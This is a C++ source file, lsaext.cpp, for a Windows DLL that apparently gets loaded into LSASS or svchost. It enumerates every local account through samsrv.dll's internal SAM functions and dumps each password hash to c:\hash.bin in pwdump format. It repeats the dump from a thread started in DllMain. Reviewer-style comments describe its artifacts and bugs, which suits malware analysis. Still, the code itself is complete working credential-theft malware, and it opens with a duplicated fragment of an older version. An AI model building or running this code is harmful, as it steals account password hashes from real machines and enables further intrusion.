📄 lsaext.cpp
}
pSamIFree_SAMPR_ENUMERATION_BUFFER( pEnum );
pEnum = NULL;
}
else
{
SendText( "SamrEnumerateUsersInDomain failed: 0x%08x", enumRc );
}
} while( enumRc == 0x105 );
if (pf){
fclose(pf);
}
SendText( "Samr Enumerate %d Users In Domain %S.\n", ret, pDomainInfo->DomainName.Buffer );
ret = 0;
exit:
// Clean up
#ifdef _DEBUG
SendText( "ok\n" );
#endif
if( hUser ) pSamrCloseHandle( &hUser );
if( hDomain ) pSamrCloseHandle( &hDomain );
if( hSam ) pSamrCloseHandle( &hSam );
if( hLsa ) LsaClose( hLsa );
if( hPipe ) CloseHandle( hPipe );
if( hp ) CloseHandle( hp );
if( hSamsrv ) FreeLibrary( hSamsrv );
return ret;
}
// Enumerate every account in the local account domain through samsrv.dll's
// internal SAM entry points and append each account's stored password OWFs
// to c:\hash.bin as one "name:rid:<hex>:<hex>:::" line, with a short
// progress/error trail in c:\hash.log. Contrary to the original comment,
// nothing in this function writes to the registry.
// The pid and hid parameters are unused; magic is only fed to obfuscate()
// for an in-memory record that is built but never transmitted (the
// SendBuffer call is commented out).
// Returns 0 immediately when the host process is neither LSASS.EXE nor
// svchost.exe, ERROR_LOAD_SAMDLL / ERROR_LOAD_SAMFUNC when samsrv.dll or its
// exports cannot be resolved, the initial ERROR_NO_ERROR when a later LSA/SAM
// call fails, and 0 after the enumeration loop completes.
// Analyst notes: observable artifacts are the two fixed file paths above, a
// LoadLibrary of samsrv.dll by the host, and LsaOpenPolicy requesting
// POLICY_ALL_ACCESS. The identifier starts with a double underscore, which is
// reserved for the implementation in C/C++.
int __GetHash( unsigned pid, unsigned hid, unsigned magic )
{
int i;
char szExeName[256];
// Resolve the host executable's path and reduce it to the basename after the
// last backslash. On GetModuleFileName failure i is 0, Ptr stays at the
// start of the (now empty) string and the gate below rejects it.
i = (INT)GetModuleFileName(NULL,szExeName,255);
szExeName[i] = '\0';
PCHAR Ptr = &szExeName[i];
while (Ptr > &szExeName[0]){
if ('\\' == *Ptr){
++Ptr;
break;
}
--Ptr;
}
// Host gate (case-insensitive): proceed only inside LSASS.EXE or svchost.exe.
// This runs before any file is opened, so no artifact is created elsewhere.
if (stricmp(Ptr,"LSASS.EXE") &&
stricmp(Ptr,"svchost.exe")){
return 0;
}
LSA_OBJECT_ATTRIBUTES attributes;
LSA_HANDLE hLsa = 0;
PLSA_UNICODE_STRING pSysName = NULL;
// Filled by LsaQueryInformationPolicy below; it is not released with
// LsaFreeMemory anywhere in the cleanup at exit.
POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo;
NTSTATUS rc, enumRc;
HSAM hSam = 0;
HDOMAIN hDomain = 0;
HUSER hUser = 0;
// Resume context for SamrEnumerateUsersInDomain across paged calls.
DWORD dwEnum = 0;
DWORD dwNumber;
SAM_USER_ENUM *pEnum = NULL;
HINSTANCE hSamsrv;
// Declared but never read or written below.
static BOOL bCopy = FALSE;
// Append-mode diagnostic log; every failure path writes a short marker here
// when the open succeeded. A NULL log is tolerated (each write is guarded).
FILE *log = fopen("c:\\hash.log","ab");
int ret = ERROR_NO_ERROR;
// Get Sam functions: the SAM RPC server exports are resolved dynamically
// from samsrv.dll into the file-scope function pointers used below.
if( NULL == (hSamsrv = LoadLibrary( "samsrv.dll" ) ) )
{
ret = ERROR_LOAD_SAMDLL;
if (log){
char e[] = "LoadLibary error\r\n";
fwrite(e,1,strlen(e),log);
}
// SendText( "LoadLibrary samsrv.dll failed, error: %u\n", GetLastError() );
goto exit;
}
pSamIConnect = (SamIConnectFunc) GetProcAddress( hSamsrv, "SamIConnect" );
pSamrOpenDomain = (SamrOpenDomainFunc) GetProcAddress( hSamsrv, "SamrOpenDomain" );
pSamrOpenUser = (SamrOpenUserFunc) GetProcAddress( hSamsrv, "SamrOpenUser" );
pSamrQueryInformationUser = (SamrQueryInformationUserFunc) GetProcAddress( hSamsrv, "SamrQueryInformationUser" );
pSamrEnumerateUsersInDomain = (SamrEnumerateUsersInDomainFunc) GetProcAddress( hSamsrv, "SamrEnumerateUsersInDomain" );
pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERFunc) GetProcAddress( hSamsrv, "SamIFree_SAMPR_USER_INFO_BUFFER" );
pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUUFERFunc) GetProcAddress( hSamsrv, "SamIFree_SAMPR_ENUMERATION_BUFFER" );
pSamrCloseHandle = (SamrCloseHandleFunc) GetProcAddress( hSamsrv, "SamrCloseHandle" );
// All eight exports are required; any missing one aborts before touching LSA.
if( !pSamIConnect || !pSamrOpenDomain || !pSamrOpenUser || !pSamrQueryInformationUser
|| !pSamrEnumerateUsersInDomain || !pSamIFree_SAMPR_USER_INFO_BUFFER
|| !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle )
{
ret = ERROR_LOAD_SAMFUNC;
if (log){
fwrite("proc error\r\n",1,12,log);
}
// SendText( "Failed to load functions, error: %u\n", GetLastError() );
goto exit;
}
// Open the Policy database
memset( &attributes, 0, sizeof(LSA_OBJECT_ATTRIBUTES) );
attributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
// Get policy handle on the local machine (pSysName is NULL) with full
// POLICY_ALL_ACCESS rights. From here on, failures leave ret at its initial
// ERROR_NO_ERROR value rather than a distinct error code.
rc = LsaOpenPolicy( pSysName, &attributes, POLICY_ALL_ACCESS, &hLsa );
if( rc < 0 )
{
// SendText( "LsaOpenPolicy failed: 0x%08x", rc );
if (log){
fwrite("open fail\r\n",1,11,log);
}
goto exit;
}
// Get Domain Info: only DomainSid is consumed below (DomainName is referenced
// solely in a commented-out SendText).
rc = LsaQueryInformationPolicy( hLsa, PolicyAccountDomainInformation, (void**)&pDomainInfo );
if( rc < 0 )
{
// SendText( "LsaQueryInformationPolicy failed: 0x%08x", rc );
if (log){
fwrite("query fail\r\n",1,12,log);
}
goto exit;
}
// Connect to the SAM database in-process (the internal SamIConnect, not the
// RPC client); the meaning of the trailing 1 is not documented on this page.
rc = pSamIConnect( 0, &hSam, MAXIMUM_ALLOWED, 1 );
if( rc < 0 )
{
// SendText( "SamConnect failed : 0x%08x(%u)", rc, LsaNtStatusToWinError(rc) );
if (log){
fwrite("conn fail\r\n",1,11,log);
}
goto exit;
}
// 0xf07ff is the numeric value of DOMAIN_ALL_ACCESS.
rc = pSamrOpenDomain( hSam, 0xf07ff, pDomainInfo->DomainSid, &hDomain );
if( rc < 0 )
{
// SendText( "SamOpenDomain failed : 0x%08x", rc );
hDomain = 0;
if (log){
fwrite("open domain\r\n",1,13,log);
}
goto exit;
}
// ret doubles as a running account counter inside the loop; it is reset to 0
// once enumeration finishes.
ret = 0;
// Output file for the hash lines; opened lazily on the first account that
// survives the per-user checks below.
// NOTE(review): every goto exit above jumps past this initialization — C++
// normally rejects that, so the accepted compile mode is worth confirming.
FILE *pf = NULL;
do
{
// Page through the domain's users, 1000 preferred bytes per call; 0x105 is
// STATUS_MORE_ENTRIES and keeps the loop going with dwEnum as resume context.
enumRc = pSamrEnumerateUsersInDomain( hDomain, &dwEnum, 0, &pEnum, 1000, &dwNumber );
ret += dwNumber;
if( enumRc == 0 || enumRc == 0x105 )
{
for( i = 0; i < (int)dwNumber; i++ )
{
char szUserName[300];
unsigned hashData[8];
DWORD dwSize;
PVOID pHashData = 0;
memset( szUserName, 0, sizeof(szUserName) );
// Open the user (by Rid); a failure skips the account, leaving hUser
// untouched for the next iteration.
rc = pSamrOpenUser( hDomain, MAXIMUM_ALLOWED, pEnum->users[i].rid, &hUser );
if( rc < 0 )
{
// SendText( "SamrOpenUser(0x%x) failed: 0x%08x", pEnum->users[i].rid, rc );
if (log){
fwrite("open user\r\n",1,11,log);
}
continue;
}
// Get the password OWFs (32 bytes are read from pHashData below).
rc = pSamrQueryInformationUser( hUser, SAM_USER_INFO_PASSWORD_OWFS, &pHashData );
if( rc < 0 )
{
// SendText( "SamrQueryInformationUser failed: 0x%08x", rc );
pSamrCloseHandle( &hUser );
hUser = 0;
if (log){
fwrite("query info\r\n",1,12,log);
}
continue;
}
// Convert the username and rid. name.Length is presumably a byte count
// (UNICODE_STRING convention), halved to characters and capped at the
// buffer size; the buffer was zeroed, so the result is NUL-terminated
// unless the name fills all 300 bytes — confirm against the struct.
dwSize = min( sizeof(szUserName), pEnum->users[i].name.Length >> 1 );
wcstombs( szUserName, pEnum->users[i].name.Buffer, dwSize );
if (NULL == pf){
pf = fopen("c:\\hash.bin","ab");
}
// One record per account: "<name>:<rid>:" followed by bytes 16..31 of the
// OWF buffer in hex, ":", bytes 0..15 in hex, then ":::\r\n".
if (pf){
fwrite(szUserName,1,strlen(szUserName),pf);
char szTemp[1024];
int l = sprintf(szTemp,":%d:",pEnum->users[i].rid);
fwrite(szTemp,1,l,pf);
for (l = 16;l < 32;l++){
sprintf (szTemp,"%02X",( (PBYTE)pHashData)[l]);
fwrite(szTemp,1,strlen(szTemp),pf);
}
fwrite(":",1,1,pf);
for (l = 0;l < 16;l++){
sprintf (szTemp,"%02X",( (PBYTE)pHashData)[l]);
fwrite(szTemp,1,strlen(szTemp),pf);
}
fwrite(":::\r\n",1,5,pf);
}
// Source and destination alias here (szUserName on both sides), which the
// C standard leaves undefined; the record it builds is only consumed by the
// commented-out SendBuffer below.
sprintf( szUserName, "%s:%d:", szUserName, pEnum->users[i].rid );
// Convert the user data: copy the 32 OWF bytes, transform them with magic,
// and append the raw result after the string terminator.
memcpy( hashData, pHashData, 32 );
obfuscate( hashData, magic, 8 );
// From this line on pHashData points into szUserName, no longer at the SAM
// buffer returned by SamrQueryInformationUser.
pHashData = strchr( szUserName, '\0' );
memcpy( pHashData, hashData, sizeof( hashData ) );
// SendBuffer( szUserName, (char*)pHashData - szUserName + sizeof(hashData) + 1 );
// Free stuff
// NOTE(review): because of the reassignment above, this free receives the
// stack address, and the original SAM buffer is never released.
pSamIFree_SAMPR_USER_INFO_BUFFER( pHashData, SAM_USER_INFO_PASSWORD_OWFS );
pHashData = 0;
pSamrCloseHandle( &hUser );
hUser = 0;
}
pSamIFree_SAMPR_ENUMERATION_BUFFER( pEnum );
pEnum = NULL;
}
else
{
// SendText( "SamrEnumerateUsersInDomain failed: 0x%08x", enumRc );
}
} while( enumRc == 0x105 );
if (pf){
fclose(pf);
}
// SendText( "Samr Enumerate %d Users In Domain %S.\n", ret, pDomainInfo->DomainName.Buffer );
ret = 0;//
exit:
// Clean up: handles are released in reverse acquisition order; pDomainInfo
// is not freed here.
#ifdef _DEBUG
// SendText( "ok\n" );
#endif
if( hUser ) pSamrCloseHandle( &hUser );
if( hDomain ) pSamrCloseHandle( &hDomain );
if( hSam ) pSamrCloseHandle( &hSam );
if( hLsa ) LsaClose( hLsa );
if( hSamsrv ) FreeLibrary( hSamsrv );
if (log){
fclose(log);
}
return ret;
}
// Thread routine started from DllMain: re-runs __GetHash(0,0,0) twenty times
// at two-second intervals (first run after the initial sleep), then returns
// the iteration count (always 20). lpCtx is unused. The double-underscore
// name is reserved for the implementation in C/C++.
DWORD WINAPI __Proc(IN LPVOID lpCtx){
DWORD i = 0;
do {
Sleep(2000);
__GetHash(0,0,0);
++i;
} while (i < 20);
return i;
}
// DLL entry point. On DLL_PROCESS_ATTACH it spawns __Proc on a new thread and
// also runs __GetHash once synchronously; other reasons are ignored. Always
// returns TRUE, so the load never fails from here.
// NOTE(review): __GetHash calls LoadLibrary and fopen while the loader lock
// is held during DLL_PROCESS_ATTACH, which Microsoft's DllMain guidance
// warns against; the CreateThread handle is discarded (never closed) and
// Tid is not read afterwards.
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
if (fdwReason == DLL_PROCESS_ATTACH){
DWORD Tid;
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)__Proc,NULL,0,&Tid);
__GetHash(0,0,0);
}
return TRUE;
}